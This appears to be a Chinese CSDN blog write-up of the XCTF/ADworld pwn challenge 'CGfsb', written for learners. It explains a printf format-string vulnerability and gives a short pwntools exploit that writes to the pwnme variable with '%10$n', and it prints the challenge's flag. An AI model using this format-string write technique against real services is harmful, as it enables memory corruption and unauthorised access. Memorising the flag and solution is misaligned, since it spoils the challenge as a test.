【ADworld】Pwn--CGfsb

最新推荐文章于 2023-01-11 12:09:51 发布
最新推荐文章于 2023-01-11 12:09:51 发布
阅读量1k 收藏
点赞数 1
分类专栏: adworld.xctf.org.cn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34072526/article/details/87228006
版权

Description:

菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用

Solution:

先checksec,没有PIE(没有开启地址空间随机化)再file(dynamically linked→动态链接)运行一下扔到IDA里看看(32位的)可以看到 pwnme == 8 时会执行 system(“cat flag”);
不过 pwnme == 8 并不重要,重要的是如何执行 system(“cat flag”);
可以看到上面一句有一个 printf(&s);
就会想到格式化字符串漏洞
我们双击 pwnme == 8 的 pwnme ,看到 pwnme 的地址然后去确定偏移量从aaaa的后面一段地址一直数到 61616161 一共10个,确定偏移量为10
接下来就可以构造payload了

from pwn import *
# r = process('./cgfsb')
r = remote('111.198.29.45', '31310')
r.recvuntil("please tell me your name:")
r.send('')
r.recvuntil("leave your message please:")
payload = p32(0x0804A068)
r.send(payload + 'aaaa%10$n')
r.interactive()

1.p32() 可以让我们转换整数到小端序格式,p32转换4byte,p64和p16 则分别转换8 byte和2 byte的整数
2.%num$x 是直接读取第num个位置的参数(在linux下有用,win下没用)


最后运行,之前忘截图了,用本地文件演示了,不过没有flag文件
本人也是小白,多亏了这位博主的多篇文章帮助理解
https://blog.csdn.net/qq_43394612/article/details/85196669

Flag:

xctf{fd4b59af511c633a933047cc90c89f1d}

VZZmieshenquan
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界(pwn篇)---CGfsb
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-09 1584
攻防世界(pwn篇)—CGfsb 文章目录攻防世界(pwn篇)---CGfsb题目描述基本情况分析运行分析IDA 分析格式化字符串漏洞分析出payload找一下 s 的偏移量再看一看 pwnme 的地址exp 题目描述 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 基本情况分析 checksec命令可以查看可执行文件开启的保护 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.S
攻防世界-CGfsb详细知识点及解答
最新发布
m0_74047686的博客
03-07 668
做这道题的时候,对于格式化字符串的知识要有一定了解,不然的话,就要像我一样,忙来忙去,很麻烦的如何利用格式化字符串呢?我做了一些知识总结。格式化字符串攻击(Format String Vulnerabilities,简称FSV)是指攻击者通过构造恶意格式化字符串控制符,在程序中读写不该被访问的内存区域、获取敏感信息等操作。攻击者通常利用以下方式来实施格式化字符串攻击:(1)打印栈上的数据。
adworld攻防世界-pwn-新手区-wp
令则
03-05 914
adworld-pwn-新手区 tcl 到现在才算是正经昨晚攻防世界的pwn新手区, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
攻防世界-adworld-crypto-Caesar
32bin的博客
10-28 150
你成功的解出了来了灯谜,小鱼一脸的意想不到“没想到你懂得这么多啊!” 你心里面有点小得意,“那可不是,论学习我没你成绩好轮别的我知道的可不比你少,走我们去看看下一个” 你们继续走,看到前面也是热热闹闹的,同样的大红灯笼高高挂起,旁边呢好多人叽叽喳喳说个不停。你一看 大灯笼,上面还是一对字符,你正冥思苦想呢,小鱼神秘一笑,对你说道,我知道这个的答案是什么了。73最佳Writeup由 Umo. 提供WriteUP。题目来源: poxlove3。解出人数:23201。
攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解
qq_35066257的博客
09-25 809
攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解 在开始看这题之前,可以看CTF-wiki中有关格式化字符串漏洞的利用[link]https://wiki.x10sec.org/pwn/fmtstr/fmtstr_exploit/ 这边就简单的介绍格式化字符串中覆盖内存的方式:%n$n,这串字符的意思是将前面打印的字符个数,写入到第n个指针对应的地址中,下面就以CGfsb这题来举个例子 ...
adworld-wargame:我对https://adworld.xctf.org.cntask上的pwn挑战的利用
02-13
adworld-wargame 我对上的pwn挑战的利用
Adworld2012互联网营销世界大会PPT下载
07-23
教程名称: Adworld2012互联网营销世界大会PPT下载【】APPS新媒体运营及营销探索-岳建雄-搜狐【】体育营销动起来-陈鄂-力美【】品牌广告推动移动营销创新-郭伟-安沃传媒【】基于受众的网络广告交易市场-王岳龙-传漾...
【XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
【XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
【XCTF-RE】新手练习区-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
攻防世界详解CGfsb,格式化字符串漏洞,欢迎讨论
XDiku的博客
01-11 256
格式化字符串漏洞
ADworld_level_2
qq_62423835的博客
02-11 579
一部分转载了adworld里的wp,就不用去里面买wp了!
攻防世界-CGfsb
qq_45771413的博客
04-23 417
知识点 格式化字符串漏洞(printf) 检查保护 PIE没有保护,全局变量地址固定 IDA 逻辑很简单,输入name,输入message,然后当pwnme等于8时,自动执行cat flag操作。但是pwnme没有被赋值,也没有可操作的地方,需要把它改成8。 但是找了一圈没发现有栈溢出的地方,看wp发现是格式化字符串漏洞,只能嗯学(栈溢出还没整熟悉〒▽〒)。 格式化字符串知识点 格式化字符串(摘自CTF-WIKI) 格式化字符串函数是根据格式化字符串函数来进行解析的。那么相应的要被解析的参数的个数也自然
[攻防世界]CGfsb
逆向萌新的博客
06-20 207
[攻防世界]CGfsb详解
攻防世界-pwn CGfsb (格式化字符串)
菜的只能随便写写博客
08-05 1562
0x01 拿到题目之后首先分析文件 得到信息: 32bit ELF可执行文件 未开启PIE(即静态反汇编得地址可以直接使用) 0x02 执行文件 执行文件之后发现程序接收两个输入并将其原样输出   0x03 利用IDA反汇编 发现flag,需要将pwnme的值改为8才能拿到flag 通过查找发现pwnme在bss段,并且在程序之中用到了printf,可以考虑用格式化串漏洞将...
CGfsb pwn
qq_62539372的博客
04-08 311
格式化字符串漏洞 标志 printf(&s) 查看一下保护 运行一下 第十个参数是我们传的 分析程序可得pwnme==8的时候 cat flag 利用fgets函数 改掉pwnme的值 改为8 脚本 from pwn import * #r=process("./CGfsb") r=remote('111.200.241.244',53697) pwnme_addr=0x0804A068 payload=p32(pwnme_addr)+b'%4c%10$n' r.sendlineaf.
攻防世界 pwn cgfsb writeup
PLpa的博客
07-06 1858
攻防世界pwn——cgfsb 这一题是关于格式化字符串漏洞的题,是一个单一漏洞题,不需要太多的绕过。 拿到题目首先查看一下保护: 可以看到,这是一个32位的程序。 并且开启了Canary保护和NX保护。 我们看一下IDA: 进入IDA,按下F5可以得到伪C代码: 可以看到有一个格式化漏洞printf(&s),我们可以通过这条语句把pwnme的值改为8,就可以的到flag了。 打开gdb...
CGfsb writeup 格式化字符串漏洞的简单利用
ditto的博客
12-22 4217
如果对格式化字符串漏洞不怎么了解,推荐看《灰帽黑客》这本书,也可以看看我博客里的https://blog.csdn.net/qq_43394612/article/details/84900668 拿到题目,先看下开启了什么保护措施 没有开启PIE(内存地址分布随机化) file下 是动态链接 运行下 就是让你先输入name,再输入message就完事了。 放到IDA里看一下。 很明显是格...
CGCTF pwn CGfsb writeup
qq_39596232的博客
08-23 578
一、实验目的: 破解我的第一个pwn,获取flag(虽然也参考了别人*^*O*^*) 二、实验环境: Ubuntu 18.04 / gdb-peda / pwntools Windows7 IDA pro 三、实验内容: 1、题目到手,我们拿到了一个网址和ELF文件,首先我们对ELF文件进行分析: tucker@ubuntu:~/pwn_files$ checksec...
攻防世界-adworld-Morse
32bin的博客
10-28 296
小鱼得意的瞟了你一眼,神神气气的拿走了答对谜语的奖励,你心里暗暗较劲 想着下一个谜题一定要比小鱼更快的解出来。上面没什么提示信息,只是刻着一些0和1,感觉有着一些奇怪的规律,你觉得有些熟悉,但是就是想不起来 这些01代表着什么意思。一旁的小鱼看你眉头紧锁的样子,扑哧一笑,对你讲“不好意思我又猜到答案了。”(flag格式为cyberpeace{xxxxxxxxxx},均为小写)131最佳Writeup由 吴心恋战 提供WriteUP。题目来源: poxlove3。解出人数:20661。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值